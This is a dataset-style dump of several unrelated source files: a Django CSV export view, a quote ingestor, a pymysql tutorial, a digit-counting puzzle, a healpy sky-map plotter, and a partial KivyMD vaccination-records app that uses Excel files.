'room_near_person_request',\n 'normal_bed_time',\n 'arrival_day',\n 'departure_day',\n 'wants_housing_subsidy',\n 'wants_2023_housing_subsidy',\n 'wants_canadian_currency_exchange_discount',\n 'additional_housing_info',\n 'dietary_needs',\n 'other_dietary_needs',\n 'banquet_food_choice',\n 'is_bringing_guest_to_banquet',\n 'banquet_guest_name',\n 'banquet_guest_food_choice',\n\n 'EXTRAS',\n 'tshirt1',\n 'tshirt2',\n 'donation',\n\n 'CHARGES',\n *CHARGE_CSV_LABELS,\n 'Work Study Scholarship',\n 'Housing Subsidy?',\n 'Housing 2023 Single Room Subsidy?',\n 'Trust Discount?',\n 'Subtotal',\n 'Total',\n 'charges',\n]\n\n# -----------------------------------------------------------------------------\n\n\nclass DownloadFirstClassChoicesCSVView(LoginRequiredMixin, UserPassesTestMixin, View):\n def get(self, *args: Any, **kwargs: Any) -> HttpResponse:\n return make_class_first_choices_csv(\n get_object_or_404(ConclaveRegistrationConfig, pk=self.kwargs['conclave_config_pk'])\n )\n\n def test_func(self) -> bool:\n return is_conclave_team(self.request.user)\n\n\ndef make_class_first_choices_csv(conclave_config: ConclaveRegistrationConfig) -> HttpResponse:\n response = HttpResponse(content_type='text/csv')\n response['Content-Disposition'] = (\n f'attachment; filename=\"conclave_{conclave_config.year}_class_first_choices.csv\"')\n\n classes = list(conclave_config.classes.all())\n first_choices_per_class = {str(class_): [] for class_ in classes}\n\n for entry in conclave_config.registration_entries.order_by('pk'):\n if not entry.is_finalized or not hasattr(entry, 'regular_class_choices'):\n continue\n\n choices = entry.regular_class_choices\n\n if choices.period1_choice1:\n first_choices_per_class[str(choices.period1_choice1)].append(entry.user)\n if choices.period2_choice1:\n first_choices_per_class[str(choices.period2_choice1)].append(entry.user)\n if choices.period3_choice1:\n first_choices_per_class[str(choices.period3_choice1)].append(entry.user)\n if choices.period4_choice1:\n first_choices_per_class[str(choices.period4_choice1)].append(entry.user)\n\n if choices.flex_choice1:\n first_choices_per_class[str(choices.flex_choice1)].append(entry.user)\n\n writer = csv.DictWriter(response, fieldnames=['Class', 'Who Picked as First Choice'])\n writer.writeheader()\n for class_name, first_choices in first_choices_per_class.items():\n writer.writerow({\n 'Class': class_name,\n 'Who Picked as First Choice': '\\n'.join(\n map(lambda user: f'{user.first_name} {user.last_name} ({user.username})',\n first_choices)\n )\n })\n\n return response\n","repo_name":"vdgsa/user_backend","sub_path":"vdgsa_backend/conclave_registration/views/registration_csv_view.py","file_name":"registration_csv_view.py","file_ext":"py","file_size_in_byte":14259,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"27373638479","text":"\"\"\"Module for ingesting TXT files.\"\"\"\nfrom .IngestorInterface import IngestorInterface\nfrom .QuoteModel import QuoteModel\n\n\nclass TextIngestor(IngestorInterface):\n \"\"\"Class for ingesting TXT files.\"\"\"\n\n allowed_extensions = [\"txt\"]\n\n @classmethod\n def parse(cls, path=\"../_data/DogQuotes/DogQuotesTXT.txt\"):\n \"\"\"Parse quote file.\"\"\"\n if not cls.can_ingest(path):\n raise Exception('cannot ingest this file type')\n quotes = []\n with open(path, 'r') as f:\n for line in f.readlines():\n body, author = line.strip('\\n').split(' - ')\n quotes.append({\"body\": body, \"author\": author})\n\n quote_models = []\n for quote 
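# Note on the registration_csv_view.py sample above (seq_id 20673741560): its
# make_reg_csv leans on csv.DictWriter(..., extrasaction='ignore'): row dicts may
# carry keys that are not in CSV_HEADERS (e.g. optional sections) and the writer
# silently drops them instead of raising ValueError, while missing declared keys
# become empty cells. A tiny self-contained demo of both behaviours:
import csv
import io

buf = io.StringIO()
writer = csv.DictWriter(buf, fieldnames=["email", "program"], extrasaction="ignore")
writer.writeheader()
# 'internal_note' is undeclared, so it is dropped; 'program' is absent, so it is
# written as an empty cell (the default restval).
writer.writerow({"email": "a@example.com", "internal_note": "skipped"})
print(buf.getvalue())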
in quotes:\n qm = QuoteModel(quote[\"body\"], quote[\"author\"])\n quote_models.append(qm)\n\n return quote_models\n","repo_name":"lemonez/udacity-memegen-project","sub_path":"src/QuoteEngine/TextIngestor.py","file_name":"TextIngestor.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"6136314310","text":"# python连接mysql\n# 方法一:\n# import pymysql\n# conn = pymysql.connect(host='127.0.0.1', user='root', passwd='123456', db='devops', charset='utf8')\n# print(conn)\n# 打印出此信息说明python连接mysql成功。\n\n# 方法二:\nimport pymysql\nsqlArgs = {\n'host':'127.0.0.1',\n 'port': 3306,\n 'user': 'root',\n 'passwd': '123456',\n 'db': 'devops',\n 'charset': 'utf8'\n}\nconn = pymysql.connect(**sqlArgs)\nprint(conn)\n\ncursor = conn.cursor() # 建立游标\nrow = cursor.execute(\"show tables\") # 执行sql语句\ndata = cursor.fetchone() # 取出一条数据\ndata = cursor.fetchmany(3) # 取出3条数据\ndata = cursor.fetchall() # 全部取出\nprint(data)\n\n# 新增数据\n# 单条\n# row=cursor.execute(\"insert into stars (name,age)values('邓肯',23)\")\n# row=cursor.execute('insert into stars(name,age) VALUES (%s,%s)',('科比',23))\nconn.commit()\n\n# 批量\nrows=cursor.executemany('insert into stars(name,age) VALUES (%s,%s)',[('杜兰特',1),('卡哇伊',2)])\nconn.commit()\n\ncursor.close()\nconn.close()\n\n# 完整规范示例:\ntry:\n rows=cursor.executemany('insert into stars(name,age) VALUES (%s,%s)',[('杜兰特',1),('卡哇伊',2)])\n conn.commit()\nexcept :\n conn.rollback()\nfinally:\n cursor.close()\n conn.close()","repo_name":"1712825001/fullstack","sub_path":"【0】网络拾遗/python连接mysql、redis、mongodb/pymysql.py","file_name":"pymysql.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"28978083536","text":"N = int(input())\r\nsumma = 0 # накапливаем сумму\r\ncnt = 0 # накапливаем количество чисел\r\nd = 0 # текущая степень десятки = количество цифр в числах\r\nwhile True:\r\n d += 1 \r\n summa += .9 * 10 ** d * d # например, для двузначных: 90 чисел, в них 90 * 2 цифр\r\n if summa > N: # остановиться, этот разряд уже целиком не прибавляем\r\n break\r\n cnt += .9 * 10 ** d # добавить в счет все d-разрядные числа\r\nsumma -= .9 * 10 ** d * d # вычитаем последнее слагаемое из суммы\r\ncnt += (N - summa) / d # вычитаем накопленную сумму, находим, сколько не хватает чисел текущей разрядности\r\nprint(cnt)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n''' \r\nn = int(input())\r\nresult = 0\r\ndegree = 0 # степень 10\r\ndigits = 1 # количество цифр в числе\r\nwhile True:\r\n if n < 9 * digits * 10 ** degree:\r\n result += n // digits\r\n break\r\n else:\r\n n -= 9 * (10 ** degree) * digits\r\n result += 9 * (10 ** degree)\r\n degree += 1\r\n digits += 1\r\nprint(result)\r\n'''","repo_name":"varvalamey/1535-radio-fuck-off","sub_path":"km.py","file_name":"km.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"26987402771","text":"# coding: utf-8\n\n# In[1]:\n\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport healpy\nimport os\nimport sys\nimport astropy.coordinates\nfrom astropy import units as u\nfrom astropy.io import fits\nfrom astropy.utils.data import get_pkg_data_filename\nfrom astropy.time import Time\n\n\n# In[2]:\n\n\n# file can be retrived by running !wget http://danielcjacobs.com/uploads/test4.fits\nmappy = healpy.read_map(\"test4.fits\")\n\n\n# 
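# Note on the pymysql tutorial sample above (seq_id 6136314310): its comments are
# in Chinese; in short it demonstrates two connect styles (explicit kwargs vs. a
# **dict), fetchone/fetchmany/fetchall, single and batch inserts, and commit.
# Its closing "complete example" reuses a cursor and connection that were already
# closed a few lines earlier. A self-contained sketch of the same pattern with
# parameterized queries and context-managed cursor cleanup (the connection
# settings are placeholders copied from the sample):
import pymysql


def insert_stars(rows):
    conn = pymysql.connect(host="127.0.0.1", user="root",
                           password="123456", db="devops", charset="utf8")
    try:
        with conn.cursor() as cursor:  # cursor is closed automatically
            cursor.executemany(
                "INSERT INTO stars (name, age) VALUES (%s, %s)", rows)
        conn.commit()
    except Exception:
        conn.rollback()
        raise
    finally:
        conn.close()

# insert_stars([("杜兰特", 1), ("卡哇伊", 2)])

# Note on the digit-counting sample above (seq_id 28978083536): its comments are
# in Russian. The task: given that 1, 2, 3, ... written one after another contain
# N digits in total, how many numbers were written? It adds whole blocks of
# d-digit numbers (9 * 10**(d-1) of them, contributing 9 * 10**(d-1) * d digits)
# until a block no longer fits, then divides the leftover digit budget by d.
# A brute-force cross-check of that block arithmetic:
def count_numbers(n_digits: int) -> int:
    total, k = 0, 0
    while total < n_digits:
        k += 1
        total += len(str(k))
    return k  # assumes n_digits lands exactly on a number boundary


assert count_numbers(9) == 9             # 1..9 use 9 digits
assert count_numbers(9 + 2 * 90) == 99   # plus all 90 two-digit numbers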
In[21]:\n\n\ndef get_map():\n # Get current time\n now = Time.now()\n sidereal = now.sidereal_time(\"mean\", longitude=22.13303)\n loc = astropy.coordinates.EarthLocation(lon=22.13303, lat=-31.58)\n T = Time(now, format=\"datetime\", location=loc)\n # T = Time('2019-07-23 15:46:30', scale='utc', location = loc)\n print(T)\n\n ra = (now.sidereal_time(\"mean\", longitude=22.13303)) / u.hourangle\n dec = -31.58\n rot = [-112.13, -31.06]\n\n moon = astropy.coordinates.get_moon(T, location=loc, ephemeris=None)\n sun = astropy.coordinates.get_sun(T)\n\n ssbodies = [\"mercury\", \"venus\", \"mars\", \"jupiter\", \"saturn\", \"neptune\", \"uranus\"]\n colors = [\"grey\", \"pink\", \"red\", \"orange\", \"yellow\", \"blue\", \"blue\", \"blue\"]\n\n pic = astropy.coordinates.SkyCoord(\n ra=\"05h19m49.7230919028\", dec=\"−45° 46′ 44″\"\n ) # Pictor\n forn = astropy.coordinates.SkyCoord(ra=\"03h23m25.1s\", dec=\"-37° 08\")\n cass = astropy.coordinates.SkyCoord(ra=\"23h 23m 24s\", dec=\"+58° 48.9′\")\n crab = astropy.coordinates.SkyCoord(ra=\"05h 34m 31s\", dec=\"+22° 00′ 52.2″\")\n lmc = astropy.coordinates.SkyCoord(ra=\"05h 40m 05s\", dec=\"−69° 45′ 51″\")\n smc = astropy.coordinates.SkyCoord(ra=\"00h 52m 44.8s\", dec=\"−72° 49′ 43″\")\n cenA = astropy.coordinates.SkyCoord(ra=\"13h 25m 27.6s\", dec=\"−43° 01′ 09″\")\n callibrator1 = astropy.coordinates.SkyCoord(\n ra=109.32351 * u.degree, dec=-25.0817 * u.degree\n )\n callibrator2 = astropy.coordinates.SkyCoord(\n ra=30.05044 * u.degree, dec=-30.89106 * u.degree\n )\n callibrator3 = astropy.coordinates.SkyCoord(\n ra=6.45484 * u.degree, dec=-26.0363 * u.degree\n )\n\n source_list = [\n [moon, \"moon\", \"slategrey\"],\n [sun, \"sun\", \"y\"],\n [pic, \"pictor\", \"w\"],\n [forn, \"fornax\", \"w\"],\n [cass, \"Cass A\", \"w\"],\n [crab, \"Crab\", \"w\"],\n [lmc, \"LMC\", \"w\"],\n [cenA, \"Cen A\", \"w\"],\n [smc, \"SMC\", \"w\"],\n [callibrator1, \"J071717.6-250454\", \"r\"],\n [callibrator2, \"J020012.1-305327\", \"r\"],\n [callibrator3, \" J002549.1-260210\", \"r\"],\n ]\n\n healpy.orthview(\n np.log10(mappy),\n coord=[\"G\", \"C\"],\n rot=rot,\n return_projected_map=True,\n max=2,\n half_sky=0,\n )\n\n for item in source_list:\n if item[1] == \"sun\":\n name = item[1]\n healpy.projscatter(\n item[0].ra, item[0].dec, lonlat=True, s=1000, c=item[2], label=name\n )\n healpy.projtext(item[0].ra, item[0].dec, lonlat=True, c=\"k\", s=name)\n if item[1] == \"moon\":\n name = item[1]\n healpy.projscatter(\n item[0].ra, item[0].dec, lonlat=True, s=200, c=item[2], label=name\n )\n healpy.projtext(item[0].ra, item[0].dec, lonlat=True, c=\"k\", s=name)\n else:\n name = item[1]\n healpy.projscatter(\n item[0].ra, item[0].dec, lonlat=True, s=50, c=item[2], label=name\n )\n healpy.projtext(item[0].ra, item[0].dec, lonlat=True, c=\"k\", s=name)\n\n count = 0\n for body in ssbodies:\n name = body\n body = astropy.coordinates.get_body(body, T)\n healpy.projscatter(\n body.ra, body.dec, lonlat=True, s=50, c=colors[count], label=name\n )\n healpy.projtext(body.ra, body.dec, lonlat=True, c=\"k\", s=name)\n count += 1\n\n\nget_map()\nplt.savefig(\"out.png\")\n","repo_name":"HERA-Team/simple-dashboard","sub_path":"generator/radioskyhpx.py","file_name":"radioskyhpx.py","file_ext":"py","file_size_in_byte":3878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18742851424","text":"from email.utils import collapse_rfc2231_value\nfrom tkinter import dialog\nfrom kivy.lang import Builder\nfrom kivy.properties import 
StringProperty, NumericProperty\nfrom kivy.uix.screenmanager import Screen\nfrom kivymd.icon_definitions import md_icons\nfrom kivymd.app import MDApp\nfrom kivymd.uix.list import OneLineIconListItem\nfrom kivy.uix.textinput import TextInput\nfrom kivymd.uix.textfield import MDTextField\nfrom kivymd.uix.button import MDRaisedButton\nfrom kivy.core.audio import SoundLoader\nfrom random import randrange\nfrom kivy.config import Config\nfrom kivy.properties import ObjectProperty\nimport sys\nfrom kivy.properties import ObjectProperty, NumericProperty, StringProperty, \\\n BooleanProperty, DictProperty, OptionProperty, ListProperty, ColorProperty\nfrom kivy.logger import Logger\nfrom kivy.graphics import Color, BorderImage, Canvas\nfrom kivy.uix.textinput import TextInput\n\n#importei daqui\nfrom kivymd.uix.menu import MDDropdownMenu\nfrom kivy.metrics import dp\n\n#flatbutton e dialog\nfrom kivymd.uix.button import MDFlatButton\nfrom kivymd.uix.dialog import MDDialog\nfrom kivymd.uix.list import OneLineAvatarIconListItem\nfrom kivymd.uix.list import OneLineAvatarListItem\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivymd.uix.snackbar import Snackbar\nfrom kivy.core.window import Window\nfrom kivymd.uix.card import MDSeparator\n\n#imports do excell\n\nimport kivy \nfrom kivy.app import App \nimport os\nfrom kivy.utils import platform\nfrom datetime import datetime\nimport openpyxl\nfrom openpyxl import Workbook\nfrom openpyxl import load_workbook\n\nfrom kivy.uix.screenmanager import ScreenManager, Screen\n\nkivy.require('2.0.0')\nnow1 = datetime.now()\ndataAtual=now1.strftime(\"%d-%m-%Y %Hh%M\")\ndirdi=os.path.join(os.path.expandvars(\"%userprofile%\"),\"Documents\\\\Pap appy\")\n\ndef log(pop):\n with open(dirdi+\"Log.txt\", 'a') as f:\n print(str(datetime.now())+\" \"+pop, file=f)\n print(pop)\n\nif platform == 'android':\n\n import android\n\n from android.permissions import request_permissions, Permission\n #request_permissions([Permission.WRITE_EXTERNAL_STORAGE, Permission.READ_EXTERNAL_STORAGE])\n\n from android.storage import primary_external_storage_path\n\n #criação e checagem de diretorios\n dirPrincipal = os.path.join(r\"/storage/emulated/0/Documents/Pap appy\")\n dirDadosSalvos = os.path.join(r\"/storage/emulated/0/Documents/Pap appy/Dados Salvos\")\n \n try:\n os.makedirs(dirPrincipal)\n log(\"debug: O Diretório \" + dirPrincipal + \" foi Criado pois ele não existe!\")\n except FileExistsError:\n log(\"debug: O Diretório \" + dirPrincipal + \" não foi criado pois ele já existe!\")\n\n\n\n try:\n os.makedirs(dirDadosSalvos)\n log(\"debug: O Diretório \" + dirDadosSalvos + \" foi Criado pois ele não existe!\")\n except FileExistsError:\n log(\"debug: O Diretório \" + dirDadosSalvos + \" não foi criado pois ele já existe!\")\n \n #checagem do banco de dados raiz\n\n try:\n dirDoExcellSecundario = os.path.join(r\"/storage/emulated/0/Documents/Pap appy/locais.xlsx\")\n dirDoExcell = os.path.join(r\"/storage/emulated/0/Documents/Pap appy/ticbk.xlsx\")\n wb = openpyxl.load_workbook(dirDoExcell)\n wd= openpyxl.load_workbook(dirDoExcellSecundario)\n except FileNotFoundError as not_found:\n dirDoExcellSecundario = os.path.join(r\"locais.xlsx\")\n dirDoExcell = os.path.join(r\"pap.xlsx\")\n wb = openpyxl.load_workbook(dirDoExcell)\n wd= openpyxl.load_workbook(dirDoExcellSecundario)\n\n dirExcellDadosSalvos=os.path.join(r\"/storage/emulated/0/Documents/Pap appy/Dados salvos/Dados salvos \"+dataAtual+\".xlsx\")\n log(\"debug: o diretorio do excell é: \"+dirDoExcell)\n \nelse:\n #Criação e 
checagem de diretorios\n dirPrincipal = os.path.join(os.path.expandvars(\"%userprofile%\"),\"Documents\\\\Pap appy\")\n dirDadosSalvos = os.path.join(os.path.expandvars(\"%userprofile%\"),\"Documents\\\\Pap appy\\\\Dados Salvos\")\n \n \n try:\n os.makedirs(dirPrincipal)\n log(\"debug: O Diretório \" + dirPrincipal + \" foi Criado pois ele não existe!\")\n except FileExistsError:\n log(\"debug: O Diretório \" + dirPrincipal + \" não foi criado pois ele já existe!\")\n\n\n\n try:\n os.makedirs(dirDadosSalvos)\n log(\"debug: O Diretório \" + dirDadosSalvos + \" foi Criado pois ele não existe!\")\n except FileExistsError:\n log(\"debug: O Diretório \" + dirDadosSalvos + \" não foi criado pois ele já existe!\")\n\n #Checagem do banco de dados raiz\n try:\n dirDoExcellSecundario = os.path.join(os.path.expandvars(\"%userprofile%\"),\"Documents\\\\Pap appy\\\\locais.xlsx\")\n dirDoExcell = os.path.join(os.path.expandvars(\"%userprofile%\"),\"Documents\\\\Pap appy\\\\pap.xlsx\")\n wd=openpyxl.load_workbook(dirDoExcellSecundario)\n wb = openpyxl.load_workbook(dirDoExcell)\n log(\"Debug: estamos utilizando o tic do docs,\"+\" o diretorio do excell é: \"+dirDoExcell)\n\n \n except FileNotFoundError as not_found:\n dirDoExcellSecundario = os.path.join(os.path.expandvars(\"%userprofile%\"),\"Downloads\\\\vac.xlsx\")\n dirDoExcell = os.path.join(os.path.expandvars(\"%userprofile%\"),\"Downloads\\\\vac2.xlsx\") \n wd=openpyxl.load_workbook(dirDoExcellSecundario)\n wb = openpyxl.load_workbook(dirDoExcell)\n log(\"debug: estamos utilizando o tic da raiz, o diretorio do excell é: \"+ dirDoExcell)\n dirExcellDadosSalvos=os.path.join(os.path.expandvars(\"%userprofile%\"),\"Documents\\\\Pap appy\\\\Dados salvos\\\\Dados salvos \"+dataAtual+\".xlsx\")\n\n\n#configurações do excell\n\nwz=wd.active\nws = wb.active\n\nfrom openpyxl import Workbook\nbook = Workbook()\nsheet = book.active\nheaders = ['CPF','Nome','Ultima Vacina','Vacinas Tomadas', '', '','Data de salvamento']\nsheet.append(headers) \n\n\n#cores do app\ncolors = {\n \"Red\": {\n \"50\": \"FFEBEE\",\n \"100\": \"FFCDD2\",\n \"200\": \"EF9A9A\",\n \"300\": \"E57373\",\n \"400\": \"EF5350\",\n \"500\": \"F44336\",\n \"600\": \"E53935\",\n \"700\": \"D32F2F\",\n \"800\": \"C62828\",\n \"900\": \"B71C1C\",\n \"A100\": \"FF8A80\",\n \"A200\": \"FF5252\",\n \"A400\": \"FF1744\",\n \"A700\": \"D50000\",\n },\n \"Pink\": {\n \"50\": \"FCE4EC\",\n \"100\": \"F8BBD0\",\n \"200\": \"F48FB1\",\n \"300\": \"F06292\",\n \"400\": \"EC407A\",\n \"500\": \"E91E63\",\n \"600\": \"D81B60\",\n \"700\": \"C2185B\",\n \"800\": \"AD1457\",\n \"900\": \"880E4F\",\n \"A100\": \"FF80AB\",\n \"A200\": \"FF4081\",\n \"A400\": \"F50057\",\n \"A700\": \"C51162\",\n },\n \"Purple\": {\n \"50\": \"F3E5F5\",\n \"100\": \"E1BEE7\",\n \"200\": \"CE93D8\",\n \"300\": \"BA68C8\",\n \"400\": \"AB47BC\",\n \"500\": \"9C27B0\",\n \"600\": \"8E24AA\",\n \"700\": \"7B1FA2\",\n \"800\": \"6A1B9A\",\n \"900\": \"4A148C\",\n \"A100\": \"EA80FC\",\n \"A200\": \"E040FB\",\n \"A400\": \"D500F9\",\n \"A700\": \"AA00FF\",\n },\n \"DeepPurple\": {\n \"50\": \"EDE7F6\",\n \"100\": \"D1C4E9\",\n \"200\": \"B39DDB\",\n \"300\": \"9575CD\",\n \"400\": \"7E57C2\",\n \"500\": \"673AB7\",\n \"600\": \"5E35B1\",\n \"700\": \"512DA8\",\n \"800\": \"4527A0\",\n \"900\": \"311B92\",\n \"A100\": \"B388FF\",\n \"A200\": \"7C4DFF\",\n \"A400\": \"651FFF\",\n \"A700\": \"6200EA\",\n },\n \"Indigo\": {\n \"50\": \"E8EAF6\",\n \"100\": \"C5CAE9\",\n \"200\": \"9FA8DA\",\n \"300\": \"7986CB\",\n \"400\": \"5C6BC0\",\n 
\"500\": \"3F51B5\",\n \"600\": \"3949AB\",\n \"700\": \"303F9F\",\n \"800\": \"283593\",\n \"900\": \"1A237E\",\n \"A100\": \"8C9EFF\",\n \"A200\": \"536DFE\",\n \"A400\": \"3D5AFE\",\n \"A700\": \"304FFE\",\n },\n \"Blue\": {\n \"50\": \"E3F2FD\",\n \"100\": \"BBDEFB\",\n \"200\": \"90CAF9\",\n \"300\": \"64B5F6\",\n \"400\": \"42A5F5\",\n \"500\": \"2196F3\",\n \"600\": \"1E88E5\",\n \"700\": \"1976D2\",\n \"800\": \"1565C0\",\n \"900\": \"0D47A1\",\n \"A100\": \"82B1FF\",\n \"A200\": \"448AFF\",\n \"A400\": \"2979FF\",\n \"A700\": \"2962FF\",\n },\n \"LightBlue\": {\n \"50\": \"E1F5FE\",\n \"100\": \"B3E5FC\",\n \"200\": \"81D4FA\",\n \"300\": \"4FC3F7\",\n \"400\": \"29B6F6\",\n \"500\": \"03A9F4\",\n \"600\": \"039BE5\",\n \"700\": \"0288D1\",\n \"800\": \"0277BD\",\n \"900\": \"01579B\",\n \"A100\": \"80D8FF\",\n \"A200\": \"40C4FF\",\n \"A400\": \"00B0FF\",\n \"A700\": \"0091EA\",\n },\n \"Cyan\": {\n \"50\": \"E0F7FA\",\n \"100\": \"B2EBF2\",\n \"200\": \"80DEEA\",\n \"300\": \"4DD0E1\",\n \"400\": \"26C6DA\",\n \"500\": \"00BCD4\",\n \"600\": \"00ACC1\",\n \"700\": \"0097A7\",\n \"800\": \"00838F\",\n \"900\": \"006064\",\n \"A100\": \"84FFFF\",\n \"A200\": \"18FFFF\",\n \"A400\": \"00E5FF\",\n \"A700\": \"00B8D4\",\n },\n \"Teal\": {\n \"50\": \"E0F2F1\",\n \"100\": \"B2DFDB\",\n \"200\": \"80CBC4\",\n \"300\": \"4DB6AC\",\n \"400\": \"26A69A\",\n \"500\": \"009688\",\n \"600\": \"00897B\",\n \"700\": \"00796B\",\n \"800\": \"00695C\",\n \"900\": \"004D40\",\n \"A100\": \"A7FFEB\",\n \"A200\": \"64FFDA\",\n \"A400\": \"1DE9B6\",\n \"A700\": \"00BFA5\",\n },\n \"Green\": {\n \"50\": \"E8F5E9\",\n \"100\": \"C8E6C9\",\n \"200\": \"A5D6A7\",\n \"300\": \"81C784\",\n \"400\": \"66BB6A\",\n \"500\": \"4CAF50\",\n \"600\": \"43A047\",\n \"700\": \"388E3C\",\n \"800\": \"2E7D32\",\n \"900\": \"1B5E20\",\n \"A100\": \"B9F6CA\",\n \"A200\": \"69F0AE\",\n \"A400\": \"00E676\",\n \"A700\": \"00C853\",\n },\n \"LightGreen\": {\n \"50\": \"F1F8E9\",\n \"100\": \"DCEDC8\",\n \"200\": \"C5E1A5\",\n \"300\": \"AED581\",\n \"400\": \"9CCC65\",\n \"500\": \"8BC34A\",\n \"600\": \"7CB342\",\n \"700\": \"689F38\",\n \"800\": \"558B2F\",\n \"900\": \"33691E\",\n \"A100\": \"CCFF90\",\n \"A200\": \"B2FF59\",\n \"A400\": \"76FF03\",\n \"A700\": \"64DD17\",\n },\n \"Lime\": {\n \"50\": \"F9FBE7\",\n \"100\": \"F0F4C3\",\n \"200\": \"E6EE9C\",\n \"300\": \"DCE775\",\n \"400\": \"D4E157\",\n \"500\": \"CDDC39\",\n \"600\": \"C0CA33\",\n \"700\": \"AFB42B\",\n \"800\": \"9E9D24\",\n \"900\": \"827717\",\n \"A100\": \"F4FF81\",\n \"A200\": \"EEFF41\",\n \"A400\": \"C6FF00\",\n \"A700\": \"AEEA00\",\n },\n \"Yellow\": {\n \"50\": \"FFFDE7\",\n \"100\": \"FFF9C4\",\n \"200\": \"FFF59D\",\n \"300\": \"FFF176\",\n \"400\": \"FFEE58\",\n \"500\": \"FFEB3B\",\n \"600\": \"FDD835\",\n \"700\": \"FBC02D\",\n \"800\": \"F9A825\",\n \"900\": \"F57F17\",\n \"A100\": \"FFFF8D\",\n \"A200\": \"FFFF00\",\n \"A400\": \"FFEA00\",\n \"A700\": \"FFD600\",\n },\n \"Amber\": {\n \"50\": \"FFF8E1\",\n \"100\": \"FFECB3\",\n \"200\": \"FFE082\",\n \"300\": \"FFD54F\",\n \"400\": \"FFCA28\",\n \"500\": \"FFC107\",\n \"600\": \"FFB300\",\n \"700\": \"FFA000\",\n \"800\": \"FF8F00\",\n \"900\": \"FF6F00\",\n \"A100\": \"FFE57F\",\n \"A200\": \"FFD740\",\n \"A400\": \"FFC400\",\n \"A700\": \"FFAB00\",\n },\n \"Orange\": {\n \"50\": \"FFF3E0\",\n \"100\": \"FFE0B2\",\n \"200\": \"FFCC80\",\n \"300\": \"FFB74D\",\n \"400\": \"FFA726\",\n \"500\": \"FF9800\",\n \"600\": \"FB8C00\",\n \"700\": \"F57C00\",\n \"800\": \"EF6C00\",\n 
\"900\": \"E65100\",\n \"A100\": \"FFD180\",\n \"A200\": \"FFAB40\",\n \"A400\": \"FF9100\",\n \"A700\": \"FF6D00\",\n },\n \"DeepOrange\": {\n \"50\": \"FBE9E7\",\n \"100\": \"FFCCBC\",\n \"200\": \"FFAB91\",\n \"300\": \"FF8A65\",\n \"400\": \"FF7043\",\n \"500\": \"FF5722\",\n \"600\": \"F4511E\",\n \"700\": \"E64A19\",\n \"800\": \"D84315\",\n \"900\": \"BF360C\",\n \"A100\": \"FF9E80\",\n \"A200\": \"FF6E40\",\n \"A400\": \"FF3D00\",\n \"A700\": \"DD2C00\",\n },\n \"Brown\": {\n \"50\": \"EFEBE9\",\n \"100\": \"D7CCC8\",\n \"200\": \"BCAAA4\",\n \"300\": \"A1887F\",\n \"400\": \"8D6E63\",\n \"500\": \"795548\",\n \"600\": \"6D4C41\",\n \"700\": \"5D4037\",\n \"800\": \"4E342E\",\n \"900\": \"3E2723\",\n \"A100\": \"000000\",\n \"A200\": \"000000\",\n \"A400\": \"000000\",\n \"A700\": \"000000\",\n },\n \"Gray\": {\n \"50\": \"FAFAFA\",\n \"100\": \"F5F5F5\",\n \"200\": \"EEEEEE\",\n \"300\": \"E0E0E0\",\n \"400\": \"BDBDBD\",\n \"500\": \"9E9E9E\",\n \"600\": \"757575\",\n \"700\": \"616161\",\n \"800\": \"424242\",\n \"900\": \"212121\",\n \"A100\": \"000000\",\n \"A200\": \"000000\",\n \"A400\": \"000000\",\n \"A700\": \"000000\",\n },\n \"BlueGray\": {\n \"50\": \"ECEFF1\",\n \"100\": \"CFD8DC\",\n \"200\": \"B0BEC5\",\n \"300\": \"90A4AE\",\n \"400\": \"78909C\",\n \"500\": \"607D8B\",\n \"600\": \"546E7A\",\n \"700\": \"455A64\",\n \"800\": \"37474F\",\n \"900\": \"263238\",\n \"A100\": \"000000\",\n \"A200\": \"000000\",\n \"A400\": \"000000\",\n \"A700\": \"000000\",\n },\n \"Light\": {\n \"StatusBar\": \"E0E0E0\",\n \"AppBar\": \"F5F5F5\",\n \"Background\": \"FAFAFA\",\n \"CardsDialogs\": \"FFFFFF\",\n \"FlatButtonDown\": \"cccccc\",\n },\n \"Dark\": {\n \"StatusBar\": \"000000\",\n \"AppBar\": \"1f1f1f\",\n \"Background\": \"121212\",\n \"CardsDialogs\": \"212121\",\n \"FlatButtonDown\": \"999999\",\n },\n}\n\n#layout do app\nBuilder.load_string(\n '''\n#:import images_path kivymd.images_path\n#:import Snackbar kivymd.uix.snackbar.Snackbar\n \n\n\n IconLeftWidget:\n icon: root.icon \n\n IconLeftWidget:\n icon: root.icon\n#\n#\n# \n# \n# --------------------------Layout Da caixa de confirmaçã--------------------------------------\n#\n#\n#\n\n orientation: \"vertical\"\n spacing: \"12dp\"\n size_hint_y: None\n height: \"360dp\"\n padding:\"12dp\"\n\n MDLabel:\n text: \"CPF: \"+app.namez\n font_style:\"Subtitle2\"\n MDTextField:\n mode: \"rectangle\"\n hint_text: \"\"\n text: app.dialogCpf\n line_color_normal:\"#398c36\"\n text_color_normal:\"#398c36\"\n disabled:True\n MDLabel:\n text: \"Ultima Vacina:\"\n font_style:\"Subtitle2\"\n MDTextField:\n mode: \"rectangle\"\n hint_text: \"\"\n text: app.dialogTurno\n line_color_normal:\"#398c36\"\n text_color_normal:\"#398c36\"\n disabled:True\n MDLabel:\n text: \"Doses Tomadas:\"\n font_style:\"Subtitle2\"\n MDTextField:\n mode: \"rectangle\"\n markup: True\n font_style: 'H1'\n hint_text: \"\"\n text: app.dialogVacinas\n line_color_normal:\"#398c36\"\n text_color_normal:\"#398c36\"\n disabled:True\n\n\n \n IconLeftWidget:\n icon: root.icon \n#\n#\n#\n#\n#\n#--------------------------Layout Principal--------------------------------------\n#\n#\n#\n\n MDBoxLayout:\n orientation: 'vertical'\n spacing: dp(0)\n padding: dp(0)\n MDBoxLayout:\n adaptive_height: True\n \n MDToolbar:\n title: 